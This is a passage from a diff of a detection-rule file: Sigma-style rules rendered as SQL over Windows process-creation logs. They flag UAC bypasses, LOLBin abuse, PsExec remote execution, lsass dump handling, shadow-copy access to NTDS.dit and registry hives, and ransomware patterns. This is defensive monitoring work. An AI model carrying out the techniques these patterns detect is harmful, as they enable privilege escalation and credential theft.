'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Office application called wmic to proxye execution through a LOLBIN process. 
This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - 
"author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, 
PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "status": "experimental", + "description": "Detects execution of the Notepad++ updater (gup) from 
a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron 
Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": 
"5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1204" ], "falsepositives": [ - "Unlikely" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata 
characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2022-29072 
Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "status": "experimental", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": 
